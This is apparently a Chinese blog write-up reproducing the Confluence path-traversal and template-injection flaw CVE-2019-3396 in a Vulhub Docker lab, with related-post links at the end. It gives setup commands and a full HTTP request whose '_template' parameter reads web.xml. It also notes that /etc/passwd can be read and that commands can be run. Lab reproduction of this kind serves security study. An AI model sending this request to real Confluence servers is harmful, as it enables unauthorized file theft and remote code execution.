Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396)

  • Vulnhub官方复现教程
    • 漏洞原理
  • 复现漏洞
    • 启动环境
  • 漏洞复现

Vulnhub官方复现教程

https://vulhub.org/#/environments/confluence/CVE-2019-3396/

漏洞原理

Atlassian Confluence是企业广泛使用的wiki系统,其6.14.2版本前存在一处未授权的目录穿越漏洞,通过该漏洞,攻击者可以读取任意文件,或利用Velocity模板注入执行任意命令。

参考资料:

  • https://paper.seebug.org/884/
  • https://jira.atlassian.com/browse/CONFSERVER-57974

复现漏洞

启动环境

https://blog.csdn.net/JiangBuLiu/article/details/93853056

进入路径为

cd /root/vulhub/confluence/CVE-2019-3396

搭建及运行漏洞环境:

docker-compose build && docker-compose up -d

环境搭建时间,略久- -建议站起来旋转跳跃一会:)
环境启动后,访问http://your-ip:8090会进入安装引导,选择“Trial installation”,之后会要求填写license key。点击“Get an evaluation license”,去Atlassian官方申请一个Confluence Server的测试证书(不要选择Data Center和Addons):

[外链图片转存失败(img-FF9I0fFU-1562319422385)(https://vulhub.org/vulhub/confluence/CVE-2019-3396/1.png)]
(由于我没有梯子(2019年6月几乎大家的都失效了)不能用谷歌邮箱了,懒得注册,所以这个就不复现了)
然后点击Next安装即可。这一步小内存VPS可能安装失败或时间较长(建议使用4G内存以上的机器进行安装与测试),请耐心等待。

如果提示填写cluster node,路径填写/home/confluence即可:

[外链图片转存失败(img-pXTOZ6HZ-1562319422386)(https://vulhub.org/vulhub/confluence/CVE-2019-3396/4.png)]

后续可能要求你填写数据库账号密码,选择postgres数据库,地址为db,账号密码均为postgres

[外链图片转存失败(img-GzCNEbtd-1562319422386)(https://vulhub.org/vulhub/confluence/CVE-2019-3396/5.png)]

漏洞复现

发送如下数据包,即可读取文件web.xml

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 176{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"../web.xml"}}}

[外链图片转存失败(img-MAn4NxmT-1562319422386)(https://vulhub.org/vulhub/confluence/CVE-2019-3396/6.png)]

6.12以前的Confluence没有限制文件读取的协议和路径,我们可以使用file:///etc/passwd来读取文件,也可以通过https://...来加载远程文件。

该文件是一个Velocity模板,我们可以通过模板注入(SSTI)来执行任意命令:

[外链图片转存失败(img-2TBi8xdy-1562319422387)(https://vulhub.org/vulhub/confluence/CVE-2019-3396/7.png)]

利用Vulnhub复现漏洞 - Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396)相关推荐

  1. 【vulhub】Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396)复现与反思!

    特征 1.8090端口 2.confluence图标(如图所示) 搭建环境 搭建confluence看这4篇教程,该cve搭建是用Confluence Server, 但是tm就是没有Confluen ...

  2. Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396)莫得复现

    漏洞简介 Atlassian Confluence是企业广泛使用的wiki系统,其6.14.2版本前存在一处未授权的目录穿越漏洞,通过该漏洞,攻击者可以读取任意文件,或利用Velocity模板注入执行 ...

  3. Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396)

    目录 Confluence 漏洞背景 漏洞影响版本 环境搭建 漏洞复现 任意文件读取

  4. Atlassian Confluence OGNL表达式注入代码执行漏洞(CVE-2021-26084)

    环境搭建: 使用vulhub,进入文件夹启动环境: docker-compose up -d 环境启动后,访问http://your-ip:8090即可进入安装向导,参考CVE-2019-3396这个 ...

  5. [ web 漏洞篇 ] 常见web漏洞总结之 RCE 远程代码 / 命令执行漏洞总结

  6. Nexus Repository Manager 3 远程命令执行漏洞 CVE-2019-7238

    目录 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 漏洞复现 端口设置 Vulnhub官方复现教程 https://vulhub.org/#/environments/nexus/CVE- ...

  7. 远程命令执行漏洞与远程代码执行漏洞33333

    远程命令执行漏洞的概念 远程命令执行漏洞,指用户通过浏览器提交执行操作命令, 由于服务器端,没有针对执行函数做过滤,就执行了恶意命令 远程代码执行漏洞概念 代码执行漏洞也叫代码注入漏洞,指用户通过浏览 ...

  8. Tomcat- AJP协议文件读取/命令执行漏洞(CVE-2020-1938 / CNVD-2020-10487)

    CVE-2020-1938 1.概述 1.1 tomcat概述 1.2 gostcat概述 - 漏洞概述 2. 漏洞成因 2.1 前置基础 2.1.1 Tomcat Connector(连接器) 2. ...

  9. 命令执行漏洞之远程命令执行和系统命令执行

    渗透学习 命令执行漏洞 文章目录 渗透学习 前言 *本文只做学习用途,严禁利用本文提到的技术进行非法攻击,否则后果自负,本人不承担任何责任.* 一.命令执行漏洞概述 二.实验步骤 1.管道符号 2.远 ...

最新文章

  1. word怎么根据点画曲线_圆锥曲线联解公式
  2. c#小软件(SaveClassic)开发手记--(3)基础类(MP3播放类MP3Player)
  3. dart 语言是jvm_Dart编译技术在服务端的探索和应用
  4. 段寄存器和8种地址寻址方式
  5. HDU - 7031 Power Station of Art 思维 + 二分图模型
  6. phpcmsV9文章页时间 - 踩坑篇
  7. EfficientNetV2:训练速度快了5~10x,更小,更快,精度更高的EfficientNet
  8. 查询oracle数据库里面所有的表名
  9. xcode swift_CocoaPods Swift XCode教程
  10. 【英语天天读】Develop Your Own Helping Rituals
  11. CF991E Bus Number
  12. 6.3 交通工具类
  13. VS2017设置透明主题
  14. 目标检测经典论文——YOLOv3论文翻译:YOLOv3: An Incremental Improvement(YOLOv3:增量式的改进)
  15. 荣耀4a鸿蒙,赵明:6 月起芯片供应将全面恢复,荣耀未来会考虑用华为鸿蒙系统...
  16. 如果你想要做好抖音直播间需要注意的其他事项(三)
  17. 从电路交换到分组交换——TDM、ATM
  18. Java eclipse控制台按任意键返回主菜单 控制台清屏
  19. iOS地图定位导航与大头针的简单使用
  20. 医院IPTV系统搭建 智慧医疗解决方案

热门文章

  1. CSS小技巧之两行文字两端对齐
  2. python高级编程---数据结构
  3. 用于Quoted-Printable编解码的JAVA类
  4. Java 实现Ftp上传下载文件
  5. python z3库的安装
  6. c语言高精度算法阶乘_任意位数的高精度阶乘算法 C语言版
  7. [python + pillow] 修改图片的尺寸
  8. GT928 TP驱动跟读及虚拟按键上报解析
  9. C++函数参数传递详解
  10. 标签打印软件如何批量生成数字防伪码